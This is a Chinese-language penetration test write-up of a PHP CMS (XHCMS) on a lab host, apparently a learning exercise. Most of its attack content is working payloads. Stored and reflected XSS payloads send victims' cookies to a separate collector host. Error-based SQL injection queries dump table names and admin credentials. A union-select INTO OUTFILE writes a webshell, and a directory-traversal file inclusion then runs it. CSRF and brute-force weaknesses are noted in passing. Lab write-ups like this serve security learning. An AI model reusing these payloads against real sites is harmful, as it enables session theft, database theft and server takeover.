熊海这次是黑盒渗透测试
域名扫描:御剑
- 200
- 302
- 403
- http://192.168.18.182:82/phpmyadmin/
- http://192.168.18.182:82/phpmyadmin/db_create.php
- http://192.168.18.182:82/phpmyadmin/libraries/lect_lang.lib.php
- http://192.168.18.182:82/phpmyadmin/themes/darkblue_orange/layout.inc.php
- http://192.168.18.182:82/phpmyadmin/libraries/select_lang.lib.php
- http://192.168.18.182:82/phpmyadmin/libraries/mcrypt.lib.php
1、XSS存储型漏洞
消除<script>
经过尝试,存在名称中
<a href='javascript:location.href="http://192.168.18.141/sefa15/xss/getcookie.php?url="%2Blocation.href%2B"%26cookie="%2Bdocument.cookie'>huang</a>
传输cookie成功
修改一下
使用beef更加方便
广泛存在,在管理员登录页面中,文章和广告都有
2、get cid存在
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: r=content&cid=18 AND (SELECT 4468 FROM(SELECT COUNT(*),CONCAT(0x71626b6b71,(SELECT (ELT(4468=4468,1))),0x7176767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
简化一下:and updatacml(1,concet(0x7f,database(),0x7f),1)
获取表名:and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema in (0x7868636d73)),0x7e),1)
显示结果少了一部分
进行改进:and updatexml(1,concat(0x7e,(select mid(group_concat(table_name),62,30) from information_schema.tables where table_schema in (0x7868636d73)),0x7e),1)
获取全部表名
获取字段:and updatexml(1,concat(0x7e,(select mid(group_concat(column_name),1,32) from information_schema.columns where table_name in (0x73656e696f72736574)),0x7e),1)
改进: and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name in (0x73656e696f72736574) limit 0,1),0x7e),1)
获取详细信息:and updatexml(1,concat(0x7e,(select concat_ws(9,user,password) from xhcms.manage limit 0,1),0x7e),1)
报错注入,存在,可以获取全部信息
后面的post,留言功能等也都存在,sql报错注入
此外,管理员登录页面也存在sql注入点
全部都是报错注入
管理员用户登录的账号处,没有单引号过滤,可以使用联合查询,同时可以植入木马,在使用文件包含进行读取
管理员登录植入木马:admin' union select 1,2,3,4,5,6,7,'' into outfile '/tmp/mu.php'--+
3、验证码绕过存在
4、XSS反射型
http://192.168.18.182:82/?r=download&page=1<script>location.href=http://192.168.18.141/sefa15/ssrf/cookie.php?cookie=%2Bdocument.cookie</script>
存在反射型漏洞
5、管理员用户密码爆破
缺少限制
6、CSRF
管理员用户修改密码处
设置一个POC,成功修改密码
7、越权
在登录管理员用户输入正确密码以后
进行抓包可以发现,在cookie中多了一个user=admin
尝试直接访问,admin页面,手动添加一个user=admin
越权不行,在删除cookie后,再次使用无法进行,之前应该是使用了本地的cookie
8、文件包含
因为,存在file/ 导致php伪协议不能使用了
只能使用文件包含
http://192.168.18.182:82/?r=../../dashboard/phpinfo,尝试目录穿越成功
该漏洞需要配合,管理员用户的sql注入漏洞,进行文件读取,直接读木马文件